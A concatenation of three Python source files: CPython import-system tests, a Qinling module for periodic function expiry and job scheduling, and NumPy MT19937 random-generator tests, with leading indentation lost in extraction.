with open(init_path, 'w', encoding='utf-8') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w', encoding='utf-8') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
        if 'exec_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
def test_binding(self):
try:
import test.test_import.data.circular_imports.binding
except ImportError:
self.fail('circular import with binding a submodule to a name failed')
def test_crossreference1(self):
import test.test_import.data.circular_imports.use
import test.test_import.data.circular_imports.source
def test_crossreference2(self):
with self.assertRaises(AttributeError) as cm:
import test.test_import.data.circular_imports.source
errmsg = str(cm.exception)
self.assertIn('test.test_import.data.circular_imports.source', errmsg)
self.assertIn('spam', errmsg)
self.assertIn('partially initialized module', errmsg)
self.assertIn('circular import', errmsg)
def test_circular_from_import(self):
with self.assertRaises(ImportError) as cm:
import test.test_import.data.circular_imports.from_cycle1
self.assertIn(
"cannot import name 'b' from partially initialized module "
"'test.test_import.data.circular_imports.from_cycle1' "
"(most likely due to a circular import)",
str(cm.exception),
)
def test_unwritable_module(self):
self.addCleanup(unload, "test.test_import.data.unwritable")
self.addCleanup(unload, "test.test_import.data.unwritable.x")
import test.test_import.data.unwritable as unwritable
with self.assertWarns(ImportWarning):
from test.test_import.data.unwritable import x
self.assertNotEqual(type(unwritable), ModuleType)
self.assertEqual(type(x), ModuleType)
with self.assertRaises(AttributeError):
unwritable.x = 42
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
periodics.py
|
# Copyright 2017 Catalyst IT Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from datetime import timedelta
import threading
from futurist import periodics
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import timeutils
from qinling import context
from qinling.db import api as db_api
from qinling.db.sqlalchemy import models
from qinling import rpc
from qinling import status
from qinling.utils import constants
from qinling.utils import etcd_util
from qinling.utils import executions
from qinling.utils import jobs
from qinling.utils.openstack import keystone as keystone_utils
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
_periodic_tasks = {}
@periodics.periodic(300)
def handle_function_service_expiration(ctx, engine):
"""Clean up resources related to expired functions.
    If it's an image function, we rely on the orchestrator itself to do the
    image cleanup, e.g. the image garbage collection feature in Kubernetes.
"""
context.set_ctx(ctx)
delta = timedelta(seconds=CONF.engine.function_service_expiration)
expiry_time = datetime.utcnow() - delta
results = db_api.get_functions(
sort_keys=['updated_at'],
insecure=True,
updated_at={'lte': expiry_time}
)
for func_db in results:
if not etcd_util.get_service_url(func_db.id, 0):
continue
LOG.info(
'Deleting service mapping and workers for function '
'%s(version 0)',
func_db.id
)
# Delete resources related to the function
engine.delete_function(ctx, func_db.id, 0)
# Delete etcd keys
etcd_util.delete_function(func_db.id, 0)
versions = db_api.get_function_versions(
sort_keys=['updated_at'],
insecure=True,
updated_at={'lte': expiry_time},
)
for v in versions:
if not etcd_util.get_service_url(v.function_id, v.version_number):
continue
LOG.info(
'Deleting service mapping and workers for function '
'%s(version %s)',
v.function_id, v.version_number
)
# Delete resources related to the function
engine.delete_function(ctx, v.function_id, v.version_number)
# Delete etcd keys
etcd_util.delete_function(v.function_id, v.version_number)
@periodics.periodic(3)
def handle_job(engine_client):
"""Execute job task with no db transactions."""
jobs_db = db_api.get_next_jobs(timeutils.utcnow() + timedelta(seconds=3))
for job in jobs_db:
job_id = job.id
func_alias = job.function_alias
if func_alias:
alias = db_api.get_function_alias(func_alias, insecure=True)
func_id = alias.function_id
func_version = alias.function_version
else:
func_id = job.function_id
func_version = job.function_version
LOG.debug("Processing job: %s, function: %s(version %s)", job_id,
func_id, func_version)
func_db = db_api.get_function(func_id, insecure=True)
trust_id = func_db.trust_id
try:
# Setup context before schedule job.
ctx = keystone_utils.create_trust_context(
trust_id, job.project_id
)
context.set_ctx(ctx)
if (job.count is not None and job.count > 0):
job.count -= 1
            # Job delete/update is done with a non-locking
            # UPDATE ... FROM ... WHERE clause.
if job.count == 0:
modified = db_api.conditional_update(
models.Job,
{
'status': status.DONE,
'count': 0
},
{
'id': job_id,
'status': status.RUNNING
},
insecure=True,
)
else:
next_time = jobs.get_next_execution_time(
job.pattern,
job.next_execution_time
)
modified = db_api.conditional_update(
models.Job,
{
'next_execution_time': next_time,
'count': job.count
},
{
'id': job_id,
'next_execution_time': job.next_execution_time
},
insecure=True,
)
if not modified:
LOG.warning(
                    'Job %s has already been handled by another periodic '
'task.', job_id
)
continue
LOG.debug(
"Starting to execute function %s(version %s) by job %s",
func_id, func_version, job_id
)
params = {
'function_id': func_id,
'function_version': func_version,
'input': job.function_input,
'sync': False,
'description': constants.EXECUTION_BY_JOB % job_id
}
executions.create_execution(engine_client, params)
except Exception:
LOG.exception("Failed to process job %s", job_id)
finally:
context.set_ctx(None)
def start_function_mapping_handler(engine):
"""Start function mapping handler thread.
    The function mapping handler is supposed to run alongside the engine
    service.
"""
worker = periodics.PeriodicWorker([])
worker.add(
handle_function_service_expiration,
ctx=context.Context(),
engine=engine
)
_periodic_tasks[constants.PERIODIC_FUNC_MAPPING_HANDLER] = worker
thread = threading.Thread(target=worker.start)
    thread.daemon = True
thread.start()
LOG.info('Function mapping handler started.')
def start_job_handler():
"""Start job handler thread.
    The job handler is supposed to run alongside the API service.
"""
worker = periodics.PeriodicWorker([])
engine_client = rpc.get_engine_client()
worker.add(
handle_job,
engine_client=engine_client
)
_periodic_tasks[constants.PERIODIC_JOB_HANDLER] = worker
thread = threading.Thread(target=worker.start)
    thread.daemon = True
thread.start()
LOG.info('Job handler started.')
def stop(task=None):
if not task:
        # Iterate over a copy: entries are deleted while iterating.
        for name, worker in list(_periodic_tasks.items()):
LOG.info('Stopping periodic task: %s', name)
worker.stop()
del _periodic_tasks[name]
else:
worker = _periodic_tasks.get(task)
if worker:
LOG.info('Stopping periodic task: %s', task)
worker.stop()
del _periodic_tasks[task]
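# A standalone usage sketch (illustrative, not part of the module above) of
# the futurist pattern it relies on: a @periodics.periodic callback driven
# by a PeriodicWorker on a daemon thread, then stopped, mirroring
# start_job_handler() and stop().
import threading
import time

from futurist import periodics


@periodics.periodic(1)  # fire roughly every second (handle_job uses 3s)
def tick():
    print('tick')


worker = periodics.PeriodicWorker([])
worker.add(tick)
runner = threading.Thread(target=worker.start)
runner.daemon = True
runner.start()
time.sleep(3)  # let a few iterations run
worker.stop()  # the same call stop() issues for each registered worker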
|
test_generator_mt19937.py
|
import sys
import pytest
import numpy as np
from numpy.testing import (
assert_, assert_raises, assert_equal,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy.random import Generator, MT19937, SeedSequence
random = Generator(MT19937())
@pytest.fixture(scope='module', params=[True, False])
def endpoint(request):
return request.param
class TestSeed(object):
def test_scalar(self):
s = Generator(MT19937(0))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937(4294967295))
assert_equal(s.integers(1000), 324)
def test_array(self):
s = Generator(MT19937(range(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937(np.arange(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937([0]))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937([4294967295]))
assert_equal(s.integers(1000), 324)
def test_seedsequence(self):
s = MT19937(SeedSequence(0))
assert_equal(s.random_raw(1), 2058676884)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, MT19937, -0.5)
assert_raises(ValueError, MT19937, -1)
def test_invalid_array(self):
# seed must be an unsigned integer
assert_raises(TypeError, MT19937, [-0.5])
assert_raises(ValueError, MT19937, [-1])
assert_raises(ValueError, MT19937, [1, -2, 4294967296])
def test_noninstantized_bitgen(self):
assert_raises(ValueError, Generator, MT19937)
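# Illustrative aside (not part of the original test module): all of the
# seeding paths above normalize through SeedSequence, and
# SeedSequence.spawn() is the supported way to derive independent streams.
_children = SeedSequence(12345).spawn(2)
_g0, _g1 = (Generator(MT19937(c)) for c in _children)
# _g0 and _g1 now draw from statistically independent streams.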
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.integers(-5, -1) < -1)
x = random.integers(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random = Generator(MT19937(1432985819))
non_contig = random.multinomial(100, pvals=pvals)
random = Generator(MT19937(1432985819))
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.rg = Generator(MT19937(self.seed))
self.bit_generator = self.rg.bit_generator
self.state = self.bit_generator.state
self.legacy_state = (self.state['bit_generator'],
self.state['state']['key'],
self.state['state']['pos'])
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.rg.standard_normal(size=3)
self.bit_generator.state = self.state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
    def test_gaussian_reset_in_medias_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.rg.standard_normal()
state = self.bit_generator.state
old = self.rg.standard_normal(size=3)
self.bit_generator.state = state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.rg.negative_binomial(0.5, 0.5)
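# Illustrative aside (not part of the original test module): the state
# round-trip TestSetState exercises. Assigning bit_generator.state rewinds
# the stream so the same draws are produced again.
_rg = Generator(MT19937(1234567890))
_saved = _rg.bit_generator.state  # plain-dict snapshot
_first = _rg.standard_normal(3)
_rg.bit_generator.state = _saved  # restore
assert np.all(_first == _rg.standard_normal(3))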
class TestIntegers(object):
rfunc = random.integers
# valid integer/boolean types
itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self, endpoint):
assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)
def test_bounds_checking(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint,
dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [ubnd], [lbnd],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, [0],
endpoint=endpoint, dtype=dt)
def test_bounds_checking_array(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)
assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd] * 2,
[ubnd + 1] * 2, endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [1] * 2, 0,
endpoint=endpoint, dtype=dt)
def test_rng_zero_and_extremes(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
is_open = not endpoint
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000,
endpoint=endpoint, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], [tgt + is_open],
size=1000, endpoint=endpoint, dtype=dt),
tgt)
def test_rng_zero_and_extremes_array(self, endpoint):
size = 1000
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
tgt = ubnd - 1
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = lbnd
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc([tgt], [tgt + 1],
size=size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(self.rfunc(
[tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt)
def test_full_range(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_full_range_array(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError("No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e))
def test_in_bounds_fuzz(self, endpoint):
# Don't use fixed seed
random = Generator(MT19937())
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16,
endpoint=endpoint, dtype=dt)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint,
dtype=bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_scalar_array_equiv(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
size = 1000
random = Generator(MT19937(1234))
scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
scalar_array = random.integers([lbnd], [ubnd], size=size,
endpoint=endpoint, dtype=dt)
random = Generator(MT19937(1234))
array = random.integers([lbnd] * size, [ubnd] *
size, size=size, endpoint=endpoint, dtype=dt)
assert_array_equal(scalar, scalar_array)
assert_array_equal(scalar, array)
def test_repeatability(self, endpoint):
import hashlib
        # We use an MD5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {'bool': 'b3300e66d2bb59e493d255d47c3a6cbe',
'int16': '39624ead49ad67e37545744024d2648b',
'int32': '5c4810373f979336c6c0c999996e47a1',
'int64': 'ab126c15edff26f55c50d2b7e37391ac',
'int8': 'd1746364b48a020dab9ef0568e6c0cd2',
'uint16': '39624ead49ad67e37545744024d2648b',
'uint32': '5c4810373f979336c6c0c999996e47a1',
'uint64': 'ab126c15edff26f55c50d2b7e37391ac',
'uint8': 'd1746364b48a020dab9ef0568e6c0cd2'}
for dt in self.itype[1:]:
random = Generator(MT19937(1234))
# view as little endian for hash
if sys.byteorder == 'little':
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt)
else:
val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint,
dtype=dt).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random = Generator(MT19937(1234))
val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint,
dtype=bool).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_repeatability_broadcasting(self, endpoint):
for dt in self.itype:
            lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min
            ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# view as little endian for hash
random = Generator(MT19937(1234))
val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint,
dtype=dt)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint,
dtype=dt)
assert_array_equal(val, val_bc)
random = Generator(MT19937(1234))
val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000,
endpoint=endpoint, dtype=dt)
assert_array_equal(val, val_bc)
def test_int64_uint64_broadcast_exceptions(self, endpoint):
configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)),
np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0),
(-2**63-1, -2**63-1))}
for dtype in configs:
for config in configs[dtype]:
low, high = config
high = high - endpoint
low_a = np.array([[low]*10])
high_a = np.array([high] * 10)
assert_raises(ValueError, random.integers, low, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_a,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high_a,
endpoint=endpoint, dtype=dtype)
                low_o = np.array([[low]*10], dtype=object)
                high_o = np.array([high] * 10, dtype=object)
assert_raises(ValueError, random.integers, low_o, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_o,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_o, high_o,
endpoint=endpoint, dtype=dtype)
def test_int64_uint64_corner_case(self, endpoint):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
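        # Concretely: np.uint64(2**63) >= np.int64(2**63 - 1) is evaluated
        # through float64, where both operands round to 2.0**63, which is
        # why a naive `lbnd >= ubnd` comparison used to misfire here.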
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)
# None of these function calls should
# generate a ValueError now.
actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
        for dt in (bool, int):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert not hasattr(sample, 'dtype')
assert_equal(type(sample), dt)
def test_respect_dtype_array(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint,
dtype=dt)
assert_equal(sample.dtype, dt)
def test_zero_size(self, endpoint):
# See gh-7203
for dt in self.itype:
sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
assert sample.shape == (3, 0, 4)
assert sample.dtype == dt
assert self.rfunc(0, -10, 0, endpoint=endpoint,
dtype=dt).shape == (0,)
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape,
(3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
def test_error_byteorder(self):
other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4'
with pytest.raises(ValueError):
random.integers(0, 200, size=10, dtype=other_byteord_dt)
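# Illustrative aside (not part of the original test module): the endpoint
# flag threaded through TestIntegers switches integers() between the
# half-open interval [low, high) and the closed interval [low, high].
_rg = Generator(MT19937(0))
assert _rg.integers(0, 2, size=100).max() <= 1                 # draws from {0, 1}
assert _rg.integers(0, 2, size=100, endpoint=True).max() <= 2  # draws from {0, 1, 2}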
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_integers(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2))
desired = np.array([[-80, -56], [41, 37], [-83, -16]])
assert_array_equal(actual, desired)
def test_integers_masked(self):
# Test masked rejection sampling algorithm to generate array of
# uint32 in an interval.
random = Generator(MT19937(self.seed))
actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32)
desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32)
assert_array_equal(actual, desired)
def test_integers_closed(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2), endpoint=True)
desired = np.array([[-80, -56], [ 41, 38], [-83, -15]])
assert_array_equal(actual, desired)
def test_integers_max_int(self):
# Tests whether integers with closed=True can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
actual = random.integers(np.iinfo('l').max, np.iinfo('l').max,
endpoint=True)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.096999199829214, 0.707517457682192],
[0.084364834598269, 0.767731206553125],
[0.665069021359413, 0.715487190596693]])
assert_array_almost_equal(actual, desired, decimal=15)
random = Generator(MT19937(self.seed))
actual = random.random()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_random_float(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.0969992 , 0.70751746],
[0.08436483, 0.76773121],
[0.66506902, 0.71548719]])
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_float_scalar(self):
random = Generator(MT19937(self.seed))
actual = random.random(dtype=np.float32)
desired = 0.0969992
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_unsupported_type(self):
assert_raises(TypeError, random.random, dtype='int32')
def test_choice_uniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4)
desired = np.array([0, 0, 2, 2], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([0, 1, 0, 1], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False)
desired = np.array([2, 0, 3], dtype=np.int64)
assert_array_equal(actual, desired)
actual = random.choice(4, 4, replace=False, shuffle=False)
desired = np.arange(4, dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([0, 2, 3], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random = Generator(MT19937(self.seed))
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['a', 'a', 'c', 'c'])
assert_array_equal(actual, desired)
def test_choice_multidimensional_default_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
desired = np.array([[0, 1], [0, 1], [4, 5]])
assert_array_equal(actual, desired)
